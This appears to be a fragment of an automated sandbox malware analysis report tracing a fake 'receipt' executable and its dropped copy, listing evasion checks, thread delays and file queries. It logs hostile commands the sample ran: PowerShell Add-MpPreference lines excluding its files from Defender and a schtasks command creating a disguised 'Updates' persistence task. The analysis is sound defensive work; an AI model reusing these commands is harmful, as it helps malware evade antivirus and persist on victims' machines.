            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Recaipt202431029.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: B60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: 2580000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: 2380000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: 1630000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: 30A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory allocated: 2E00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: E40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: 2C50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: 4C50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: 2D70000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory allocated: 2AD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7582
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7352
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Window / User API: threadDelayed 3591
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Window / User API: threadDelayed 6208
            Source: C:\Users\user\Desktop\Recaipt202431029.exe TID: 5560 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1576 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5240 Thread sleep count: 7352 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep count: 206 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Recaipt202431029.exe TID: 3596 Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe TID: 6508 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe TID: 3492 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Recaipt202431029.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeThread delayed: delay time: 922337203685477
            Source: Recaipt202431029.exe, 00000009.00000002.4568314491.0000000006A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Memory written: C:\Users\user\Desktop\Recaipt202431029.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Memory written: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Process created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Process created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Users\user\Desktop\Recaipt202431029.exe VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Users\user\Desktop\Recaipt202431029.exe VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe Queries volume information: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe VolumeInformation
